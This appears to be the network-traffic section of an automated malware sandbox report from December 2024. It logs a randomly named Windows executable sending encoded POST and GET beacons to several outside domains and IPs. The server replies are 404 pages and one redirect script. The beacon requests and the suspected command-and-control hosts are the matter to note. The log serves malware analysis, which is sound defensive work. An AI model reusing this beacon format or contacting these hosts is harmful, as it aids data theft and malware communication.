                                                                                                                                                        Data Ascii: ZrE=Ad+3ASsryumtgE6ALUIZKmHorGJxQFdRaIPyadsXZzV3QEfQPr/7B1yndutFFYxaei3lNi9xQ5pIBZjJ6oo14PliiMaiWbPDb6ZmbASO8Xu/ROM7ePmc9ke1Cx9F0wODD/ipyFUReOlWLbJ7R6yqmj03LcusNqhJzW6M6s+MAc/vpdarGx3FOCoSZleHAw73iXRsXCqkH5S1AeXqtiVjMVaQqrG4RS1HF4O/NHfNTrZkcnnHTQEK7yZzS+DgqJEL9/1j/2gM6c4xT1lgXFVzXi/ZX0Ysb7XM/ePTRiCASwf/liC6aF3ZGtVPgEwK6UR2q1eqKKG/42HHtR3Kd+hFKv9sa3SVNxgvZsWXc3/gwV9CUcR+hsQSFUBdWtvHyrsxY9Z7dvzI66YuOnZnjEL5NSfato/GDkJ9m0uwOTbOT3ovnKU8zWF9WsIXmZqq1jsh9nkkthfLmTJ1cuXzFqgAl7pbDD//pOXjU/mOyIsqoih4t0YbG4u/dkCWs3T1WDHroAAAb1E2PMtvpO11cnzR1LdhfSIPhGWKGqSZ6ZPQJqE7Y6Y3yJpgmKyt3L/QoivGEs9QTgfHTzWm8EasYgBvTwSesnzy9j4bwXIJdp5gyfS1pWVT6cLi5rT0farS4DWuq9vl3XLDTK1HmP+luC1N0py9vzD7MnzSvUduJuybquY0hxnV4Rh5Kgl9sEd1+Frz7oVskm9ervIMh6Y84Og+xXFtX0n2D7ph2i7b8wk896oCthlsAG8bp3x4PkCMqmvVGgtyOv8ifu7JuTCaHIftSopLm9CiyqSeIRDYXEaftBeGk5ykbF7XicsbYsfGTVmn20wqoghA+0szNtb6cx7O4nQ9VrUACzuhami0Wqemw3SAXfMos10/u6+xO7z4EZGO4ixnDNwKJyW16uZHQCoDwZ2lEyiu5bytO8EP7I2AjIrYBfHZVU5VCqBENRGdMCqxdSPMmlaZXMTcSFaoDBaiZuNrGO8dRkQY2vMo7f3lx3SHrAu1 [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:39:45.746464014 CET779INHTTP/1.1 400 Bad Request
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:45 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tkesf%2Bb6DY5Vr824dT3podnAxUrp8CL5bPqRlKMBReQrpZzw6Wb6IBL3IL7qv5wbYQmxajLjZJKs5Ku02RrnO7C%2BArWHrYPCP%2Flma1Nm7NJrizqpAA3kaE2w03SZPQR9s3kCujKSaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15aab098843ac-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1760&rtt_var=880&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1858&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 34040


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.649963104.21.31.249803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:46.863574028 CET552OUTGET /j82t/?ZrE=NfWXDnAQh5K3pnOvM14VTy+amnJPckA/Yfv/BKk9TV5fOF3SI/PjO3S5UMxnHoxUaRbUJGZsTsQcLMza5Yog8fRAodWufvWEXO0cDD2ch1ehULAsaf2d9mbkKApg9S+Ve9CxlSo=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:39:48.442142010 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:48 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rI0tjnFbErdmpJUS4HVz9oEnNtVL6kmpe84qPBaC2ALKfYYXqbdRoCOLm368heIrmkoOSuspmpYY4DXYhB6sDk9nGLRYunOi%2BQAeDyNIXLKTcVi7LYJ0GnHxxKPJT11rJOKlOHo64g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15abbb8778c45-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1800&rtt_var=900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=552&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a
                                                                                                                                                        Dec 5, 2024 05:39:48.442178011 CET68INData Raw: 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.6499773.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:54.214792013 CET833OUTPOST /lrgf/ HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.deikamalaharris.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.deikamalaharris.info/lrgf/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 73 4a 4e 61 4c 43 53 2b 35 4b 35 4a 72 6f 43 2f 56 4a 45 4f 68 47 73 48 73 7a 76 62 5a 67 47 5a 6e 41 71 46 38 32 6e 58 4a 71 4b 71 4e 70 42 50 52 79 30 73 4a 66 4b 50 6f 6c 31 73 61 54 2f 2f 2f 4c 62 72 50 35 58 4c 48 4a 64 52 45 77 4f 56 77 45 6e 37 65 4a 4b 6e 51 6a 5a 66 79 2f 50 75 30 2f 30 4e 6f 53 4b 33 51 6c 5a 2b 66 35 4e 75 62 67 36 4b 70 75 32 6e 75 2b 37 77 48 47 49 4b 30 4a 4f 73 31 42 75 30 78 35 46 4c 75 44 73 34 42 57 55 62 78 42 45 70 4f 31 4d 79 38 76 4e 66 6b 6a 65 34 39 44 5a 46 6b 38 6d 79 6f 43 42 78 47 4b 58 70 4a 61 68 4d 62 6e 6f 44 4d 42 50 4b 69 53 43 57 6b 45 2b 6c 68 46 34 36
                                                                                                                                                        Data Ascii: ZrE=sJNaLCS+5K5JroC/VJEOhGsHszvbZgGZnAqF82nXJqKqNpBPRy0sJfKPol1saT///LbrP5XLHJdREwOVwEn7eJKnQjZfy/Pu0/0NoSK3QlZ+f5Nubg6Kpu2nu+7wHGIK0JOs1Bu0x5FLuDs4BWUbxBEpO1My8vNfkje49DZFk8myoCBxGKXpJahMbnoDMBPKiSCWkE+lhF46


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        16192.168.2.6499843.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:56.877975941 CET857OUTPOST /lrgf/ HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.deikamalaharris.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.deikamalaharris.info/lrgf/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 73 4a 4e 61 4c 43 53 2b 35 4b 35 4a 72 4c 71 2f 47 34 45 4f 77 6d 73 41 70 7a 76 62 58 77 48 51 6e 41 57 46 38 79 58 48 4a 5a 2b 71 4d 4e 46 50 51 7a 30 73 49 66 4b 50 6e 46 31 74 65 54 2f 34 2f 4c 57 65 50 34 72 4c 48 4a 5a 52 45 31 69 56 77 58 2f 36 65 5a 4b 68 59 44 59 5a 78 50 50 75 30 2f 30 4e 6f 53 75 4a 51 6c 52 2b 66 4a 39 75 5a 42 36 4a 71 75 32 34 76 2b 37 77 44 47 49 4f 30 4a 4f 30 31 46 4f 4f 78 2f 42 4c 75 42 45 34 42 48 55 59 6f 52 45 76 44 56 4e 31 36 2b 4d 76 75 69 2f 42 39 56 46 67 39 65 32 33 70 30 41 72 61 35 58 4b 62 4b 42 4f 62 6c 77 78 4d 68 50 67 67 53 36 57 32 54 79 43 75 78 64 5a 69 75 6e 65 7a 36 4c 71 51 41 4b 35 45 7a 74 4b 41 6f 33 4d 59 41 3d 3d
                                                                                                                                                        Data Ascii: ZrE=sJNaLCS+5K5JrLq/G4EOwmsApzvbXwHQnAWF8yXHJZ+qMNFPQz0sIfKPnF1teT/4/LWeP4rLHJZRE1iVwX/6eZKhYDYZxPPu0/0NoSuJQlR+fJ9uZB6Jqu24v+7wDGIO0JO01FOOx/BLuBE4BHUYoREvDVN16+Mvui/B9VFg9e23p0Ara5XKbKBOblwxMhPggS6W2TyCuxdZiunez6LqQAK5EztKAo3MYA==


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        17192.168.2.6499913.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:59.533998013 CET1870OUTPOST /lrgf/ HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.deikamalaharris.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.deikamalaharris.info/lrgf/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 73 4a 4e 61 4c 43 53 2b 35 4b 35 4a 72 4c 71 2f 47 34 45 4f 77 6d 73 41 70 7a 76 62 58 77 48 51 6e 41 57 46 38 79 58 48 4a 5a 6d 71 4e 34 52 50 53 51 63 73 50 66 4b 50 75 6c 31 6f 65 54 2f 70 2f 4c 4f 53 50 34 6d 2b 48 4c 52 52 43 58 71 56 6b 32 2f 36 52 5a 4b 68 61 44 5a 65 79 2f 50 6e 30 2f 6c 45 6f 53 65 4a 51 6c 52 2b 66 4c 6c 75 4b 77 36 4a 6c 4f 32 6e 75 2b 37 47 48 47 49 6d 30 49 71 4f 31 46 4b 6b 79 4f 39 4c 76 68 55 34 4f 56 38 59 33 42 45 74 41 56 4e 58 36 37 55 77 75 69 69 2b 39 56 5a 61 39 65 53 33 70 43 39 56 4a 4a 4b 54 5a 38 64 6a 46 7a 6b 4b 46 47 2f 2b 72 52 4f 5a 6c 44 79 74 72 46 42 6f 73 4b 54 55 39 35 2b 57 53 7a 44 58 44 47 38 56 4e 37 4f 31 4c 33 42 5a 33 30 45 52 50 7a 42 67 35 4f 62 77 7a 4c 4c 53 51 6a 58 51 69 6f 4e 75 4d 4c 70 35 5a 6f 5a 57 59 55 7a 73 36 78 61 4e 37 53 4d 4c 5a 73 6e 64 59 77 49 73 64 65 51 7a 7a 59 53 46 63 54 64 50 74 41 76 68 50 39 47 52 58 58 41 73 37 66 41 57 4e 39 6c 72 4b 44 6a 70 34 30 59 70 72 78 4b 76 48 45 59 39 30 2b 6e 32 30 35 [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=sJNaLCS+5K5JrLq/G4EOwmsApzvbXwHQnAWF8yXHJZmqN4RPSQcsPfKPul1oeT/p/LOSP4m+HLRRCXqVk2/6RZKhaDZey/Pn0/lEoSeJQlR+fLluKw6JlO2nu+7GHGIm0IqO1FKkyO9LvhU4OV8Y3BEtAVNX67Uwuii+9VZa9eS3pC9VJJKTZ8djFzkKFG/+rROZlDytrFBosKTU95+WSzDXDG8VN7O1L3BZ30ERPzBg5ObwzLLSQjXQioNuMLp5ZoZWYUzs6xaN7SMLZsndYwIsdeQzzYSFcTdPtAvhP9GRXXAs7fAWN9lrKDjp40YprxKvHEY90+n205FCknXfcsn0DQcwVREORkRD/qnYBwqK8ZUSPL8RwTEEuh6rV5e1v0ydtNoKZyyfwkatw1MKUBH5K3HDSmbto/ZsrkR7fwbdsqF11qdtS8DvBkLoIJ726rozP9BFJ/ZTk9MpRkRlem20N8Ogt23qWoh38NW2jeSUdpvRgZG+Tb32K9WIyQ8BMTLt+HWQDEXG11uvAUn8KJHucV5qpdKPwdGiN6bekQBq7Cm+yBHWX92jzFlMIxZvj2QhRkg6pRoFtKjNppQx06rq9iudJtscOlGeu+YI39KWQPXXG2ZQbJb1XGev5k/77n/KCLI3WfqucRtthCqr8APaG5nBzYwCwGwS+wKTgNK0al20w8q00wbAoneXjXXyF1DVJ4uDW2c9BWOyFL/JxiuVprrIA3xhfGSkWCPO69dqdAICmferJ7GhbYu3SJxEG4GxHJPmUWN49XsTcE8U4Ckjx4vW/21yDZyVWmdaOWITRv29SHRuaCKNp1aS/uEuMA2hiQ/t731ncZsaZ4Ein3j/kkAeoNcbNtDvntUlFGKjEYmwWa8j045t4mS//dbD2wjWrh5OU1pXYyEIGeWt0O714Aky8VvZJmHonNTz4+OwPmAksbB08TAxba0mvjMCx9UozjP+95Sk6GZ/E+bL2XJADlD9186HVJTaTyqoH/h93xgE [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        18192.168.2.6499993.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:02.195569992 CET556OUTGET /lrgf/?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:40:03.278789043 CET406INHTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:03 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 72 45 3d 68 4c 6c 36 49 79 79 76 31 2f 52 47 6d 5a 57 6e 52 4a 38 62 6d 69 4d 4a 6d 54 50 36 64 68 4b 34 67 6d 32 77 69 31 66 54 43 59 43 42 52 4b 35 49 61 6b 52 77 47 4f 48 72 76 33 64 5a 59 55 48 35 79 49 58 69 65 75 69 41 47 2f 63 7a 44 51 50 4c 6d 57 71 45 62 4c 69 6c 53 7a 59 39 36 2b 66 46 38 65 56 41 6f 67 32 77 4f 45 39 65 64 4f 59 31 64 54 36 47 74 75 4f 68 71 39 62 48 44 6b 41 68 6a 65 61 5a 69 42 34 3d 26 4a 72 3d 74 6e 61 78 78 74 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx"}</script></head></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.650005162.213.249.216803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:08.918059111 CET815OUTPOST /vfa8/ HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.tophcom.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.tophcom.online/vfa8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 2f 52 72 6b 67 6e 4e 74 33 51 43 74 4d 66 6a 6c 62 5a 67 56 6e 6b 41 50 62 32 70 65 64 75 64 64 50 45 4d 47 42 32 72 7a 61 72 6c 64 6d 4f 36 32 6a 4f 67 48 6e 6c 79 41 31 56 33 6d 30 72 69 58 71 70 4b 39 63 46 4f 66 37 69 43 73 51 55 56 51 52 68 53 69 33 74 67 42 68 6f 34 46 50 67 45 6b 45 50 6b 6c 50 4c 7a 44 4d 4a 6a 56 4d 55 32 72 49 43 6f 2f 31 34 68 37 69 37 42 64 63 50 74 66 63 34 6a 69 47 52 65 7a 6d 44 38 67 6c 49 6a 51 57 39 33 39 2f 4f 35 66 79 58 77 73 4a 35 76 4d 2b 35 53 79 7a 6a 70 4a 4b 43 66 76 53 7a 74 53 31 4b 66 6d 35 47 48 36 6f 58 2f 64 38 72 62 67 47 46 76 72 74 4f 78 39 63 54 51 67
                                                                                                                                                        Data Ascii: ZrE=/RrkgnNt3QCtMfjlbZgVnkAPb2peduddPEMGB2rzarldmO62jOgHnlyA1V3m0riXqpK9cFOf7iCsQUVQRhSi3tgBho4FPgEkEPklPLzDMJjVMU2rICo/14h7i7BdcPtfc4jiGRezmD8glIjQW939/O5fyXwsJ5vM+5SyzjpJKCfvSztS1Kfm5GH6oX/d8rbgGFvrtOx9cTQg
                                                                                                                                                        Dec 5, 2024 05:40:10.150129080 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:09 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        20192.168.2.650006162.213.249.216803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:11.577081919 CET839OUTPOST /vfa8/ HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.tophcom.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.tophcom.online/vfa8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 2f 52 72 6b 67 6e 4e 74 33 51 43 74 65 72 66 6c 4c 4f 30 56 6c 45 41 51 48 6d 70 65 4b 2b 63 31 50 45 41 47 42 33 2f 6a 61 65 39 64 6d 71 2b 32 69 50 67 48 6d 6c 79 41 74 46 33 76 77 72 69 49 71 70 58 65 63 41 75 66 37 69 2b 73 51 55 46 51 52 53 71 68 6c 4e 67 44 75 49 34 44 53 51 45 6b 45 50 6b 6c 50 50 62 70 4d 4e 50 56 50 6e 2b 72 4a 6e 55 2b 2f 59 68 34 30 72 42 64 4b 50 74 62 63 34 6a 4d 47 54 72 6d 6d 42 55 67 6c 4b 37 51 57 76 66 2b 78 2b 35 5a 32 58 78 4e 46 35 47 61 32 36 58 4b 79 42 6f 6b 65 67 72 6c 54 46 73 49 70 35 66 46 72 57 6e 34 6f 56 6e 76 38 4c 62 4b 45 46 58 72 2f 5a 39 61 54 6e 31 44 66 49 44 5a 41 62 58 79 41 4d 64 6a 35 39 74 50 4a 62 61 38 33 67 3d 3d
